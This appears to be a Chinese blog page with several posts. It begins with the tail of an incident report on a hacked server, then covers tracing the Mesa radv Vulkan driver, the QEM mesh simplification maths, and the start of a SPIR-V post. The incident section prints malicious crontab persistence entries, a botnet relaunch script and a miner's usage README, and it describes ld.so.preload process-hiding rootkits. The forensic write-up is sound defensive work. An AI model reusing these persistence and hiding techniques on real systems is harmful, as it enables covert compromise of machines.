# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * /.dbus/auto >/dev/null 2>&1
* * * * * /root/.cpan/.cache/update >/dev/null 2>&1
$ sudo cat /var/spool/cron/crontabs/zx
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (.autobotchk1676891606017226.97733 installed on Mon Feb 20 19:13:26 2023)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
0,10,20,30,40,50 * * * * /home/zx/.cpan/dumb.botchk >/dev/null 2>&1
0,10,20,30,40,50 * * * * /home/zx/.cpan/nmop.botchk >/dev/null 2>&1
$ sudo cat /var/spool/cron/crontabs/spf
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (.autobotchk1676636637503791.1778717 installed on Fri Feb 17 20:23:57 2023)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
0,10,20,30,40,50 * * * * /home/spf/.cpan/spf.botchk >/dev/null 2>&1
$ sudo cat /var/spool/cron/crontabs/xy
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron installed on Fri Feb 17 18:26:23 2023)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * /home/xy/.cpan/.cache/update >/dev/null 2>&1

其中 /home/xy/.cpan/.cache/update 脚本的内容如下：

#!/bin/sh
if test -r /home/xy/.cpan/.cache/mech.pid; then
pid=$(cat /home/xy/.cpan/.cache/mech.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /home/xy/.cpan/.cache
./run &>/dev/null

其实就是调用 run 的，然后 run 来启动 botnet 的客户端。

功能分析

Special thanks to @taoky.

/kwk: VirusTotal
- 会把自己假装成 [kworker/0:0]
- 作为 IRCBot 连接到 #ddoser 频道
/mx: VirusTotal
- 加壳了的 golang 程序

/good 是个 tar.gz，里面看起来是那个 “dbus” 程序，可以用来挖门罗币

README: ~~最担心你不会用恶意软件的一集~~


(: I MAKE THIS FOR FREE, SHARE IT IF YOU LIKE :)
  ==========================================
            noname but not nobody

This miner can run as root or user :)

Simple & easy to use. No naughty backdoor.

Commands :
----------
1. Create config.json first, use : ./mkcfg <Mining Pool:Port> <Worker ID> <Wallet>
2. Start the mining : ./start

Note :
------
For proxy, use : ./mkcfg <Mining Pool Proxy:Port> <Worker ID> <Wallet>

Extra :
------
32       = Change into 32-bit
64       = Change into 64-bit
power-on = Extra command :D

Source files from https://github.com/xmrig (has no virus except you're gay)

dbus/bash: VirusTotal
dbus/hide: VirusTotal
dbus/power-on: VirusTotal
- 作为 IRCBot 连接到 #kaiten 频道
  
  “Kaiten”这个名称源自日语，意为“回转寿司”，可能是因为这种恶意软件就像回转寿司那样在受控系统之间“旋转”指令。通过IRC频道，攻击者可以远程控制和指挥受感染的机器进行各种活动，包括但不限于发动DDoS攻击、窃取数据、安装更多的恶意软件等。
  
  “这下服务器变回转寿司了，最美味的一集” (courtesy @taoky)
- 会把自己假装成 [kworker/0:0]
- 可以执行一系列 DDoS 攻击和 remote code execution 命令
xtra/:
- centos VirusTotal
- ubuntu VirusTotal
- 32 VirusTotal
- 64 VirusTotal

/home/spf/.cpan/: 一个 botnet 程序，里面一堆 Tcl 脚本和一些可执行文件
- hide: VirusTotal
- nobody: 无检出，strings 一把看起来像 Tcl 解释器 + 一些奇怪东西，VirusTotal
/dev/shm/.m-1013/dbus-collector: VirusTotal
/x: 端口扫描和 SSH 暴力攻击程序
- x/ban: VirusTotal
- x/m: VirusTotal
- x/SSH: VirusTotal
/usr/local/lib/dbus-collector/libdbus_x86_64.so: VirusTotal
- 尝试隐藏 dbus_collector，通过 hook readdir{64} 并且解析是否是对 /proc 的列目录；如果是，则返回去掉自己结果的列目录结果，从而达到在 ps 和 htop 等工具中隐藏的目的
/usr/local/lib/network.so: VirusTotal
- 尝试隐藏自己，通过 hook readdir{64} 并且解析是否是对 /proc 的列目录；如果是，则返回去掉自己结果的列目录结果，从而达到在 ps 和 htop 等工具中隐藏的目的

总结

病毒已经有 root 权限
由于发现的比较晚，很多日志 rotate 了，并且日志没有配置实时发送到远程服务器等，导致基本很难断定最初的入侵是什么时候发生的。不过基本可以确定，病毒最早在 1 月 28 日或之前就已经黑进系统了。
系统里面一共有四种类型的病毒：挖矿病毒，DDoS肉鸡病毒，远程控制病毒，SSH扫描病毒；同时，有病毒有隐藏功能，会在 /etc/ld.so.preload 里面写上自己的动态库，导致所有动态链接的程序运行前均调用病毒程序
远程控制病毒会互相连接，并且存在通过authorized_keys互相跳转的可能性；但是auth.log已经看不到那么远的日志了，可能是被rotate或者删除了
可以通过publickey方式登陆服务器的账户最好检查一下自己的主机是否已经中毒（因为publickey跳转是一种可能的感染路径，虽然没有读 code 证实）

远程控制病毒用的是 IRC 和黑客以及其他节点保持连接，并且存在对方进一步下载其它payload（比如，勒索病毒）的可能性。

此时只能建议大家赶紧备份数据到自己的机器，同时注意服务器上所有的可执行程序都应该认为是不可信任的：即，存在被病毒感染的可能性。有些存在任意代码执行的文件格式也存在被入侵的理论可能（比如 torch 非 safetensor 的 checkpoint 文件）

Mesa radv 源码阅读（一）: 如何跟踪图形栈、Vulkan Loader、Mesa 派发机制 2023-07-02

变更记录:

2023-02-11: 开始写作本文

2023-02-16: 基本完成

2023-07-02: 移出草稿区

Mesa radv 全称 Mesa Vulkan Radeon 驱动，用于 Linux 桌面平台下 AMD Radeon 独立和集成显示卡的 Vulkan 用户态驱动支持。本文主要为备忘性质，记录笔者调试和跟踪代码过程中的发现。

笔者本人接触 Linux 图形栈的时间并不很长，其中很多地方还不甚明了，如有缺漏之处，请批评指正。

您可以在博客对应的仓库的 Issue 区和我取得联系。

本文的实验均开展于截至写作时最新版本的 Arch Linux。
使用的主要软件版本如下：

mesa 22.3.3

https://gitlab.freedesktop.org/mesa/mesa/

vulkan-icd-loader 1.3.240

https://github.com/KhronosGroup/Vulkan-Loader

前言：如何跟踪 Linux 图形栈？

截至目前，笔者认为图形栈的跟踪和开发，较常规的 Linux 服务端开发等工作要更为复杂。

这种复杂性主要来源于：

厂商图形实现是高度定制化的，在通用图形 API (e.g. Vulkan, OpenGL) 下，厂商有很大的自由度来填补从用户程序图形 API 到真正向图形处理器发送命令的过程
- e.g. AMD 的 mesa Vulkan 开源驱动 radv 会经过 vulkan-icd-loader 到 mesa 到 libdrm 到内核态 amdgpu
用户的图形应用程序还需要经过窗口系统和混成器 (compositor) 才能显示到屏幕上，图形实现需要和混成器紧密配合
- X11 (DIX, DDX), GLX, DRI2, DRI3, Wayland, egl…
- 历史包袱比较多

除此之外，上面的两个方面，其中各个环节的接口文档都不甚清晰，且接口演进也比较频繁，很多时候需要「一竿子捅到底」，将各个库和软件的源码连在一起阅读，才知道真正发生了什么。

源码阅读

针对这种情况，首先需要比较方便的 C/C++ 源码阅读软件，笔者目前使用的是 OpenGrok。

该软件对源码的语义理解并不很强，因为其仅仅是采用 ctags 的方法进行简单的解析，对于需要经过预处理器的一些嵌入的宏（比如 #define WSI_CB(cb) PFN_vk##cb cb 这种样式的成员定义宏）支持并不好。其优势主要体现在跳转快速 (HTML 链接点击即跳转)，以及还算方便的 Full search 功能（比如要搜索某个函数指针成员 wait 在哪里被调用，可以搜 "->wait" 和 ".wait"）。某种意义上，笔者认为该软件可以认为是本地部署的、可以看不仅仅是内核的软件代码的增强版本 elixir。

其实感觉可以做一个用 Arch Linux 的 makepkg 构建过程中生成 compile_commands.json 并且用这个信息来指导源码阅读的工作流，最好信息都可以离线 bake 然后静态的托管到某些网站上。目前我还没发现有这样的工具存在。

TODO: 调研静态的 CodeBrowser。

另一个比较有用的准备工作是，把一个软件包的依赖的源码全部下载下来放在一起，统一放到 OpenGrok 里面，这样可以极大加速跨软件包的符号和定义的查找工作。

这里我选择 Arch Linux 的 pacman 包作为起点进行依赖查找。

值得注意的是，Arch 的包管理模型中有 “虚拟包” 的概念，比如 opengl-driver 可以被 depend 和 provide，但是并不对应一个具体的包；这样的依赖很多时候需要人工去 resolve。

TODO: 等整套工具比较完善之后，写一篇博客介绍如何将系列包的源码全部拉下来。

动态跟踪

另一个十分有用的步骤自然是运行时的行为跟踪了。

行为跟踪主要是采用 GDB + debuginfod + (感兴趣的软件包的) -debug 软件包。

在没有加载调试符号的情况下，GDB 的 step 似乎会直接越过外部函数，这种时候可以考虑 layout asm 看汇编，用 stepi 进到 call 指令里面去，GDB 此时的 backtrace 会打印出该函数所在地址对应的动态链接库 (当然，应该是从进程地址空间信息 /proc/<PID>/maps 反查的)，但具体的函数则不详。动态链接库信息可以用来让你想想到底是什么东西缺符号。

正确配置的 debuginfod 可以完成自动拉取加载的动态链接库的符号的工作，不过要看到源码本身还是需要安装 debug 包。

安装好 -debug 包后，对应的源码会在 /usr/src/debug/ 下。

debug 包的主要获取方法有两种，详情可以参考 Debugging/Getting traces - ArchWiki：

特定的 Archlinux mirror
- https://geo.mirror.pkgbuild.com/
- 但是个别包似乎会出现 debug 包内源码不全的情况，如 vulkan-icd-loader，不清楚具体原因；方法 2 无此问题
自己编译

关于如何编译 debug 包，值得简单记两笔。

打 debug 包需要

拉 PKGBUILD
- 可以考虑用 asp 这个工具自动从 GitHub (https 的话需要配合 proxychains 科学上网) 上面拉对应的 recipe
- pbget 这个工具不知道是否可以用于自动化的把依赖项目的 recipe 全部拉下来 (?)
  - 我自己测试是不行，不过是用 Python 3 + pyalpm 写的，有一定的研究和修改价值
进行编译
- ArchWiki 推荐使用 clean chroot 编译，这样也方便设定单独的 makepkg 的设置
- 使用 Wiki 中描述的，方便的方法如下：
  1. 安装 devtools 包
  2. 更改 chroot 环境内的 makepkg 配置，启用 OPTIONS 中的 debug 和 strip
    - /usr/share/devtools/makepkg-${arch}.conf 这里 arch 选择 x86_64
    - (optional) 把并行编译的 -j 也设置好，不过有些构建系统会自动检测并启用并行编译
  3. 在有 PKGBULID 的文件夹下面运行 extra-x86_64-build，然后装源码包和二进制包（pacman -U)
    - 包检查不过去没啥事；两个包都要装上，因为调试符号匹配的时候应该是有一个随机生成的 UUID 来做的
    - 如果想给 makepkg 传参需要加两个 –，比如 extra-x86_64-build -- -- --skippgpcheck

在看 elfutils 的时候同时看到了一个工具 eu-stack，可以用来截取某个进程当前时刻所有线程的栈信息，并且可以加选项 -m 来用 debuginfod 进行符号查找。

感觉在分析 GUI 程序高 CPU 占用的性能分析的场合，eu-stack 可以作为一种采样手段使用。

Vulkan Loader

Vulkan Loader 是垫在各个 Vulkan 驱动和用户程序中间的层，主要用来解决多设备枚举使用的问题。

驱动枚举

Vulkan Loader 有默认的 ICD (Installable Client Driver) 的搜索路径，向系统中安装的驱动程序会通过在给定的 ICD 路径（可能是文件夹，也可能是 Windows 注册表）中写入信息的方式来向 Vulkan Loader 报告自己的信息。

例如，/usr/share/vulkan/icd.d/radeon_icd.x86_64.json 中的信息如下：

{
    "ICD": {
        "api_version": "1.3.230",
        "library_path": "/usr/lib/libvulkan_radeon.so"
    },
    "file_format_version": "1.0.0"
}

可以看到，核心的信息是 library_path。(Ref: LoaderDriverInterface.md @ Vulkan-Loader)

另一种传入 ICD 信息的方法是 VK_DRIVER_FILES 环境变量（不过在 root 权限下无效），可以通过指定这个变量的方式，强制 Vulkan Loader 只考虑某些路径。

比如 VK_DRIVER_FILES=/usr/share/vulkan/icd.d/radeon_icd.x86_64.json vulkaninfo 可以只启用 mesa radv 实现。

驱动入口发现

每个驱动要实现 vk_icdGetInstanceProcAddr 这个调用，和 (>= Version 4) vk_icdGetPhysicalDeviceProcAddr 这个调用：

typedef void (VKAPI_PTR *PFN_vkVoidFunction)(void);

// 全局的调用，如 vkCreateInstance，会把第一个参数置为空
// 先用这个调用拿到 `vkGetDeviceProcAddr`，再进行 device level 的调用
VKAPI_ATTR PFN_vkVoidFunction VKAPI_CALL vk_icdGetInstanceProcAddr(
   VkInstance instance,
   const char* pName
);

// 主要用于 VkPhysicalDevice 为第一个参数的 Vulkan API 派发
// - 否则 Vulkan Loader 会认为这个命令是 logical device command，
//   从而尝试传入 VkDevice 对象 
// 典型用途是一些 loader 不知道的物理设备扩展
// (>= Version 7) 这个接口需要可以从 vk_icdGetInstanceProcAddr 获得
PFN_vkVoidFunction vk_icdGetPhysicalDeviceProcAddr(
   VkInstance instance,
   const char* pName
);

有些厂商会在同一个库里面实现几套 API 的用户态实现 (e.g. nvidia_icd.json 中的 libGLX_nvidia.so.0)，但驱动程序不能把 Vulkan 官方的函数名占用掉。

动态链接到 Vulkan Loader 的用户程序是通过系统例程 (dlsym 或者 GetProcAddress) 获得 vkGetInstanceProcAddr 和 vkGetDeviceProcAddr 两个函数的地址并且调用的方式来枚举其它 Vulkan API 调用的函数地址的。

1 2	PFN_vkVoidFunction (VKAPI_PTR PFN_vkGetInstanceProcAddr)(VkInstance instance, const char pName) PFN_vkVoidFunction (VKAPI_PTR PFN_vkGetDeviceProcAddr)(VkDevice device, const char pName)

Loader 的 vkGetInstanceProcAddr 的行为在官方文档中有记录。

简单来说，就是用 vk_icdGetInstanceProcAddr 一路往下找，找到的会记录在跳转表中，之后在 terminator 那边可以直接跳转过去，不用再获取。

驱动 Vulkan 对象句柄要求

Ref: https://github.com/KhronosGroup/Vulkan-Loader/blob/main/docs/LoaderDriverInterface.md#driver-dispatchable-object-creation

另一个值得了解的是 Vulkan 对象模型。3.3 Object Model @ Vulkan Spec 中提到，Vulkan API 层面提供的 VkXXXXX 等类型均为 Vulkan 对象的句柄，句柄分为可分派的 (dispatchable) 和不可分派的 (non-dispatchable) 两种。

可分派句柄 VK_DEFINE_HANDLE(): 指向某对用户不可见的具体实现类型的指针
- 截至 Vulkan SDK 1.3.236 有 VkInstance, VkPhysicalDevice, VkDevice, VkQueue, VkCommandBuffer
不可分派句柄 VK_DEFINE_NON_DISPATCHABLE_HANDLE()：64-bit 整数类型，具体意义由实现决定
- 如果开启了 Private Data 扩展的话，显然也得是指向内部实现类型的某指针（类似可分派句柄）
- 否则，实现可以决定在这 64-bit 里面直接编码好信息，不用指针

在此基础上，Vulkan Loader 要求驱动程序返回可分派句柄时：

句柄作为指针指向的内部实现的前 sizeof(uintptr) 个字节要空出来，留待 Vulkan Loader 将这一位置的值替换成跳转表地址
- 这也要求，指向的内部实现需要是 POD 的，否则可能会有虚表等结构加在实例前面，和这一要求冲突
这个空出来的位置，需要调用 include/vulkan/vk_icd.h 中的 set_loader_magic_value 设置成 ICD_LOADER_MAGIC (目前是 0x01CDC0DE)，Vulkan Loader 拿到之后会用 valid_loader_magic_value 来检测驱动程序是否正确实现了这一要求

特例: WSI 扩展

Ref: https://github.com/KhronosGroup/Vulkan-Loader/blob/main/docs/LoaderDriverInterface.md#handling-khr-surface-objects-in-wsi-extensions

在下面的平台上，VkSurfaceKHR 可以由 Vulkan Loader 负责创建和销毁：

Wayland, XCB, Xlib
Windows
Android, MacOS, QNX

对相应的 vkCreateXXXSurfaceKHR 调用，Loader 创建 VkIcdSurfaceXXX 结构，驱动程序拿到 VkSurfaceKHR 后可以将其视为到 VkIcdSurfaceXXX 的指针。

不过，如果驱动想自己接管，暴露所有 WSI KHR 要求的接口给驱动就可以了 (创建销毁，枚举 Surface 相关属性、呈现模式，创建交换链)。

Mesa Vulkan radv

Mesa 是一个相对比较庞大的项目。

本次要看的 Mesa Vulkan radv 驱动的代码主要分布在：

src/amd/vulkan/: radv_ 开头的主要代码
src/vulkan: 驱动公共设施

Mesa 的构建系统使用 Meson，src/amd/vulkan/meson.build 中的 libvulkan_radeon 就是构建出的 radv 驱动动态链接库了。

函数派发

Ref: https://gitlab.freedesktop.org/mesa/mesa/-/blob/main/docs/vulkan/dispatch.rst

我们先看 vk_icdGetInstanceProcAddr 的派发流程：

vk_icdGetInstanceProcAddr (src/amd/vulkan/radv_device.c)
radv_GetInstanceProcAddr (src/amd/vulkan/radv_device.c)
vk_instance_get_proc_addr (src/vulkan/runtime/vk_instance.c)

传入的 radv_instance_entrypoints 是一个全局变量，给出了 Instance Level 的驱动实现的函数指针。其内容是在构建过程中生成的 src/amd/vulkan/radv_entrypoints.c 中赋值的，而类型则是在构建过程中生成的 src/vulkan/util/vk_dispatch_table.h 中定义的 vk_instance_entrypoint_table 类型的结构体。

radv_entrypoints.c 定义了很多 radv_XXXX 形式的弱符号，并且将这些符号凑成了

radv_instance_entrypoints
radv_physical_device_entrypoints
radv_device_entrypoints
sqtt_device_entrypoints
metro_exodus_device_entrypoints
rra_device_entrypoints

几张表，表中填写了全部弱符号的值。根据弱符号的性质，如果程序中的其他地方没有定义相应的函数，对应的值就会为空。

vk_dispatch_table.h 和 vk_dispatch_table.c 本身是用 vk_dispatch_table_gen.py 和 Vulkan Registry XML 生成出来的。

而常用的这几个派发用的函数都是在生成的 vk_dispatch_table.c 中定义的：

vk_instance_dispatch_table_get_if_supported
vk_physical_device_dispatch_table_get_if_supported
vk_device_dispatch_table_get_if_supported

如果对应的函数实际上没有实现 (比如 radv_GetDeviceSubpassShadingMaxWorkgroupSizeHUAWEI 这个华为公司的扩展显然就没有)，那么前面几个派发表查询函数查询的结果就会为 NULL。

至于 CreateDevice 等处出现的 vk_instance_dispatch_table，则是多个 entrypoint table “综合”的结果，这样就可以实现比如 radv_xxx 没有就回退到 vk_common_xxx 的效果。

`vk_common_xxx`

一些公共入口点，里面包含了：

用 VkFoo2() 实现 VkFoo() 的一些替代逻辑，这样驱动就可以把老的接口删掉，由中间层来做兼容
VkFence，VkSemaphore 和 VkQueueSubmit2 的默认实现
- 当然，也需要驱动提供一些东西，比如 vk_sync_type 的实现

杂记

radv_physical_device: ~~万物之始~~
- radv_CreateDevice
句柄操作：
- VK_DEFINE_HANDLE_CASTS: 定义（带自己搓的类型检查的）转换函数
- VK_FROM_HANDLE：从 VkXXX 转到 Mesa 驱动自己的结构体的句柄

可能是史上最详尽的 QEM 网格简化算法解释 2023-04-11

注：请根据上下文猜测哪些是矢量，哪些是标量，因为作者懒得打了。

简介

QEM 算法（Garland and Heckbert [1998]）是网格简化领域的经典算法。

QEM Original

出现于文章 Surface Simplification Using Quadric Error Metrics 中

Formulation

设现在有网格 $ M = (V, F) $，规定可收缩顶点对为

原网格中的边
$ \| v_1 - v_2\| < \epsilon $ 的顶点对 $ (v_1, v_2) $

对每个三角形 $ F_i $，设构成该三角形的三个顶点为 $ v_0, v_1, v_2 $，则 $ F_i $ 上的点 $ v_f $ 满足方程

$$ (\vec v_f- \vec v_0) \cdot \vec n = 0 \Rightarrow \vec v_f \cdot \vec n - \vec {v_0} \cdot \vec n = 0 $$

其中面法线 $ \vec n $ 满足

$$ \vec {n} = \frac{(\vec v_1 -\vec v_0) \times (\vec v_2 - \vec v_0)}{\| (\vec v_1 -\vec v_0) \times (\vec v_2 - \vec v_0) \|} $$

空间中任意一点 $ v $ 到平面 $ F_i $ 的距离的平方为

$$ \begin{aligned} d^2(v, F_i) &= \| (\vec v-\vec v_0) \cdot \vec n \|^2 \\ &= (n^\mathbf{T} v - n^\mathbf{T} v_0 )^2 \\ &= v^\mathbf{T} (nn^\mathbf{T}) v - 2 n^\mathbf{T} v_0 n^\mathbf{T}v + (n^\mathbf{T} v_0)^2 \end{aligned} $$

定义

$$ \begin{aligned} {\bf A}_{3\times 3} &= n n^\mathbf{T}\\ d &= -n^\mathbf{T} v_0 \\ \vec b_{3 \times 1} &= d n \\ c &= d^2 \end{aligned} $$

则

$$ d^2(v, F_i) = v^\mathbf{T} {\bf A} v + 2b^\mathbf{T} v + c $$

这个距离平方也可以写成齐次形式

$$ d^2(v, F_i) = h^\mathbf{T} {\bf Q} h \\ \text{where} \ {\bf Q}_{4\times4} = \begin{pmatrix} {\bf A}_{3 \times 3} & b_{3 \times 1} \\ b^\mathbf{T} _{1 \times 3}& c_{1 \times 1} \end{pmatrix} \ \text{and} \ h= \begin{pmatrix} \vec v \\ 1 \end{pmatrix} $$

所以，对于每一个平面 $ F_i $，都可以定义一个二次型 $ Q_{F_i}(v) = h^\mathbf{T} \mathbf{Q} h $，其为任意一点 $ v$ 到该平面距离的平方。

对于顶点 $ v $，该顶点到相邻的所有表面的距离平方和可以表示为 $ \sum_{i \in \operatorname{neigh}(v_i)} Q_{F_i}(v) = (\sum_{i \in \operatorname{neigh}(v_i)} Q_{F_i})(v) $ 。

Framework

QEM 算法的框架如下：

每个顶点 $ v_i $ 按上面的方法赋予一个 Q 矩阵，$ Q_{v_i} = \sum_{i \in \operatorname{neigh}(v_i)} Q_{F_i} $
收缩 $(v_i, v_j)$ 边到 $ v’ $ 时，定义这次收缩的代价为 $ Q(v’) = (Q_{v_i} + Q_{v_j})(v’)$；每次全局的选择最小代价的边进行收缩
- 如何选择 $ v’ $？有 Optimal Placement 和 Subset Placement 两种形式：
  1. (Optimal Placement) $ {\bf A} $ 可逆时
    
    令 $ \frac{\partial}{\partial v}(v^\mathbf{T} {\bf A} v + 2b^\mathbf{T} v + c) = 0 $，解得 $ v_\text{optimal} = -{\bf A}^{-1} b $
  2. (Subset Placement) $ {\bf A} $ 不可逆时，选择两个端点或中点；看哪个 edge loss 小
收缩后的顶点 $ v’ $ 更新

这里对算法有两种理解，第一种是按初始计算的方法重新按邻面赋予 Q 矩阵（这样就是一个完全 local 的方法），第二种理解是合并两个顶点，则将对应的 Q 矩阵也进行合并。

文章中的做法是第二种理解，从文章提到 implicit track sets of planes 可以知道。不过在 Discussion 处也讨论了这种做法的问题：

Second, the information accumulated in the quadrics is essentially implicit, which can at times be problematic. Suppose we join together two cubes and would like to remove the planes associated with the now defunct interior faces. Not only is it, in general, difficult to determine what faces are defunct, there is no clear way to reliably remove the appropriate planes from the quadrics. As a result, our algorithm does not do as good a job at simplification with aggregation as we would like.

$ Q_{v'} = Q_{v_1} + Q_{v_2} $

值得注意的是， $ Q(v’) = (Q_{v_i} + Q_{v_j})(v’)$ 会导致一些 double counting 的现象发生，即有些公共面构造的 Q 分量被重复求和了。但作者提到，这样的重复对效果的影响有限。

这里引用了 Donald E. Knuth. The Art of Computer Programming, volume 1. Addison Wesley, Reading, MA, Third edition, 1997.

不是很懂高德纳老爷子和 inclusion-exclusion rule 对效果的改善的关系…

Preserving Boundaries

对于不希望边界移动的情况，可以首先标记将边标记为正常边和边界边两种（这个边界边不一定需要是真的网格边界，只是比较不希望移动的边）。

对于标记为边界边的边 $(v_1, v_2)$，令和其相邻的所有面的 Q 矩阵中增加一项反映到垂直于该平面、且过该边界边的一个平面的距离平方的项。

设边界边 $(v_1, v_2)$，不妨设某个相邻的三角形 $ F_i $ 的三个顶点为 $v_1, v_2, v_3$，则与之相对的边界平面 $ F_{B_i} $ 可以计算如下

$$ n_{F_i} = \operatorname{normalize}{ \left((v_2 - v_1) \times (v_3 - v_1) \right)} \\ n_{F_{B_i}} = \operatorname{normalize}{\left( n_{F_i} \times (v_2 - v_1) \right)} \\ \forall v \in F_{B_i},\ \vec {n_{F_{B_i}}} \cdot (\vec v - \vec {v_1}) = 0 \Rightarrow \vec {n_{F_{B_i}}} \cdot \vec v +(- \vec {n_{F_{B_i}}} \cdot \vec {v_1}) = 0 $$

则到边界平面 $ F_{B_i} $ 的距离平方计算如下：

$$ d^2(v, F_{B_i}) = h^\mathbf{T} \mathbf{Q} h \\ \text{where} \ {\bf Q}_{4\times4} = \begin{pmatrix} {\bf A}_{3 \times 3} & b_{3 \times 1} \\ b^\mathbf{T} _{1 \times 3}& c_{1 \times 1} \end{pmatrix} = \begin{pmatrix} n_{F_{B_i}}n_{F_{B_i}}^{\bf T} & (- n_{F_{B_i}} \cdot {v_1}) {n_{F_{B_i}}} \\ (- n_{F_{B_i}} \cdot {v_1}) n_{F_{B_i}}^{\bf T} & (- n_{F_{B_i}} \cdot {v_1}) ^2 \end{pmatrix} \ \text{and} \ h= \begin{pmatrix} \vec v \\ 1 \end{pmatrix} $$

把他加入到相邻面的 Q 矩阵中，最后就会进入各个边的 Q 矩阵。

Appearance Preserving QEM

出现于文章 Simplifying Surfaces with Color and Texture using Quadric Error Metrics 中

对于连续的顶点属性来说，可以通过把他们加入向量中一起优化的方法来解决。这种方法本质上是原来 QEM 的推广，将原来的到平面的距离推广为了到平面上三点的位置和其它顶点属性共同确定的超平面的距离。

同时，本文中调整了可收缩顶点对的定义，将其限制在了原三角网格中的边的范围内，因为可靠性不够好。

Our experience has shown that, while greedy edge contraction produces consistently good results on many kinds of models, greedy contraction of arbitrary pairs is not as robust and does not perform as consistently.

Formulation

将上面的三角形 $ F_i $ 的各个顶点 $ v_i $ 从 $ \mathbb{R}^3 $ 推广到 $ \mathbb{R}^n $，我们知道 3 个 $ \mathbb{R}^n $ 中的点（非线性相关）仍然确定一个 $ \mathbb{R}^2 $ 平面，这个平面的两个标准正交基向量 $ e_1 $，$ e_2 $ 可以用 Schmidt 正交化的办法得到：

$$ \begin{aligned} e_1 &= \operatorname{normalize}{(v_2-v_1)} \\ e_2 &= \operatorname{normalize}{((v_3 - v_1) - (e_1 \cdot (v_3 - v_1)) e_1)} \end{aligned} $$

这样，对于 $ v \in \mathbb{R}^n $，有

$$ \begin{aligned} d^2(v, F_i) &= \| v - v_1 \|^2 - ((v-v_1)\cdot e_1)^2 - ((v-v_1)\cdot e_2)^2 \\ &= (v-v_1)^{\bf T}(v-v_1) - ((v-v_1)^{\bf T}e_1)(e_1^{\bf T}(v-v_1)) - ((v-v_1)^{\bf T}e_2)(e_2^{\bf T}(v-v_1)) \\ &= (v^{\bf T} v - v_1^{\bf T}v-v^{\bf T} v_1 + v^{\bf T}_1 v_1) - \\ & \ \quad (v^{\bf T}e_1 e_1^{\bf T}v -v^{\bf T}_1 e_1 e_1^{\bf T}v - v^{\bf T}e_1 e_1^{\bf T} v_1 + v_1^{\bf T} e_1 e_1^{\bf T} v_1) - \\ & \ \quad (v^{\bf T}e_2 e_2^{\bf T}v -v^{\bf T}_1 e_2 e_2^{\bf T}v - v^{\bf T}e_2 e_2^{\bf T} v_1 + v_1^{\bf T} e_2 e_2^{\bf T} v_1) \\ &= (v^{\bf T} v - 2v_1^{\bf T}v + v^{\bf T}_1 v_1) - \\ & \ \quad (v^{\bf T}e_1 e_1^{\bf T}v -v^{\bf T}_1 e_1 e_1^{\bf T}v - (v_1^{\bf T} e_1 e_1^{\bf T} v)^{\bf T} + v_1^{\bf T} e_1 e_1^{\bf T} v_1) - \\ & \ \quad (v^{\bf T}e_2 e_2^{\bf T}v -v^{\bf T}_1 e_2 e_2^{\bf T}v - (v_1^{\bf T} e_2 e_2^{\bf T} v)^{\bf T} + v_1^{\bf T} e_2 e_2^{\bf T} v_1) \\ &= (v^{\bf T} v - 2v_1^{\bf T}v + v^{\bf T}_1 v_1) - \\ & \ \quad (v^{\bf T}e_1 e_1^{\bf T}v -v^{\bf T}_1 e_1 e_1^{\bf T}v - (v_1^{\bf T} e_1 e_1^{\bf T} v) + v_1^{\bf T} e_1 e_1^{\bf T} v_1) - \\ & \ \quad (v^{\bf T}e_2 e_2^{\bf T}v -v^{\bf T}_1 e_2 e_2^{\bf T}v - (v_1^{\bf T} e_2 e_2^{\bf T} v) + v_1^{\bf T} e_2 e_2^{\bf T} v_1) \\ &= v^{\bf T} ({\bf I} - e_1 e_1^{\bf T} - e_2 e_2^{\bf T}) v + 2(v^{\bf T}_1 e_1 e_1^{\bf T} + v^{\bf T}_1 e_2 e_2^{\bf T}-v_1^{\bf T}) v + (v^{\bf T}_1 v_1 -v_1^{\bf T} e_1 e_1^{\bf T} v_1 - v_1^{\bf T} e_2 e_2^{\bf T} v_1) \\ &= v^{\bf T} ({\bf I} - e_1 e_1^{\bf T} - e_2 e_2^{\bf T}) v + 2(e_1 e_1^{\bf T}v_1 +e_2 e_2^{\bf T} v_1 - v_1)^{\bf T} v + (v^{\bf T}_1 v_1 -v_1^{\bf T} e_1 e_1^{\bf T} v_1 - v_1^{\bf T} e_2 e_2^{\bf T} v_1) \\ &= v^{\bf T} ({\bf I} - e_1 e_1^{\bf T} - e_2 e_2^{\bf T}) v + 2((e_1 \cdot v_1)e_1 +(e_2 \cdot v_1)e_2 - v_1)^{\bf T} v + (v_1 \cdot v_1 - (v_1\cdot e_1)^2 - (v_1 \cdot e_2)^2) \end{aligned} $$

仿照前面，整理成 Q 矩阵的形式

$$ d^2(v, F_i) = v^\mathbf{T} {\bf A} v + 2b^\mathbf{T} v + c \\ \text{where}\ \left\{ \begin{aligned} {\bf A}_{n\times n} &= {\bf I} - e_1 e_1^{\bf T} - e_2 e_2^{\bf T} \\ {\bf b}_{n\times 1} &= (e_1 \cdot v_1)e_1 +(e_2 \cdot v_1)e_2 - v_1 \\ c_{1\times 1} &= v_1 \cdot v_1 - (v_1\cdot e_1)^2 - (v_1 \cdot e_2)^2 \end{aligned} \right. $$

Preserving Boundaries

将原始的 QEM 边界处理方法直接搬到 $ \mathbb{R}^n $ 会比较困难，因为 $ \mathbb{R}^n $ 下过两个 $ \mathbb{R}^n $ 的点并且垂直于一个平面的平面有很多个。

平面在 $ \mathbb{R}^n $ 中即为一个 $ \mathbb{R}^2 $ 子空间，垂直于该平面的向量现在构成一个“法空间”（其为 $ \mathbb{R} ^n / \mathbb{R} ^2 $ 的商空间），其维数为 $ n - 2 $，那 $ \mathbb{R}^n $ 下过两个 $ \mathbb{R}^n $ 的点并且垂直于一个平面的平面 $ \iff $ $ \mathbb{R}^n $ 下过两个 $ \mathbb{R}^n $ 的点和一个法空间中的点 $ \Rightarrow $ 这样的平面至少有 $ n - 2 $ 个

所以，这里考虑直接锁边界。

效果展示

0.5 ratio

SPIR-V 初探 (一) - Fragment Shader 2023-03-29

简介

本文主要关注 SPIR-V 1.6。

